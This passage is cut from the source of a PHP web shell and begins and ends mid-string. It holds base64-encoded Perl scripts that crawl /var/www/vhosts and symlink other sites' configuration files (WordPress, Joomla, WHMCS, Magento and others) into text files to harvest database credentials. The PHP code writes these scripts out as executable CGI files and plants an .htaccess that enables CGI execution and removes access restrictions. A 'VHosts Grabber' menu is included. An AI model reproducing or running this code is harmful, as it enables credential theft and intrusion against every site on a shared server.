cCcsJHNpdGVzcy4nLXN1Y3VyZS13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1wYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1Ym1pdHRpY2tldC5waHAnLCRzaXRlc3MuJy13aG1jczIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudGVzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50ZXMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50c3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictYmlsbGluZy50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW1hbmFnZS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXkvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbXkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL215c2hvcC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teXNob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC16ZW5jYXJ0LnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaG9wL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AtWkNzaG9wLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NtZi9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYyLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW0udHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW1zLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cGxvYWQvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXVwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FydGljbGUvY29uZmlnLnBocCcsJHNpdGVzcy4nLU53YWh5LnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZfZ2xvYmFsLnBocCcsJHNpdGVzcy4nLTYudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZS9kYi5waHAnLCRzaXRlc3MuJy03LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Nvbm5lY3QucGhwJywkc2l0ZXNzLictUEhQLUZ1c2lvbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ta19jb25mLnBocCcsJHNpdGVzcy4nLTkudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLnBocCcsJHNpdGVzcy4nLTRpbWFnZXMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZXMvZGVmYXVsdC9zZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1EcnVwYWwudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVyL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictMW1lbWJlci50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictYmlsbGluZ3MudHh0JykgOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydHMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdXBwb3J0cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9yZXF1aXJlcy9jb25maWcucGhwJywkc2l0ZXNzLictQU00U1MtaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnQvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWJpbGxpbmcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZ3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0aW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0YmlsbGluY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxscy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcy4nLU1hZ2VudG8udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYWRtaW4vY29uZmlnLnBocCcsJHNpdGVzcy4nLU9wZW5jYXJ0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9zZXR0aW5ncy5pbmMucGhwJywkc2l0ZXNzLictUHJlc3Rhc2hvcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MuJy1Mb2tvbWVkaWEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbG9rb21lZGlhL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zbGNvbmZpZy5waHAnLCRzaXRlc3MuJy1TaXRlbG9jay50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHBsaWNhdGlvbi9jb25maWcvZGF0YWJhc2UucGhwJywkc2l0ZXNzLictRWxsaXNsYWIudHh0Jyk7DQp9DQpwcmludCAiPGJyPjxicj48YnI+PGZvbnQgY29sb3I9cmVkPkRvbmUgISE8L2ZvbnQ+IjsNCg==';
3024. $file = fopen("btbt.cin" ,"w+");
3025. $write = fwrite ($file ,base64_decode($btm));
3026. fclose($file);
3027. chmod("btbt.cin",0755);
3028. echo "<center><a href='btbt' target='_blank'>Click Here</a><br>open the btbt.cin</center>";
3029. }
3030.  
3031. }
3032. elseif($_GET['do'] == 'config') {
3033. echo "<center>";
3034. echo "<ul>";
3035. echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
3036. echo "<li> <a href='?dir=$dir&do=config2'>2nd Config</a> </li>";
3037. echo "<li> <a href='?dir=$dir&do=indi'>INDISHELL</a> </li>";
3038. echo "<li> <a href='?dir=$dir&do=vgrab'>VHosts Grabber</a> </li>";
3039. echo "</ul>";
3040. echo "</center>";
3041. $idx = mkdir("btm_conf", 0777);
3042. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
3043. $htc = fopen("btm_conf/.htaccess","w");
3044. fwrite($htc, $isi_htc);
3045. fclose($htc);
3046. if(preg_match("/vhosts|vhost/", $dir)) {
3047. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3048. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLC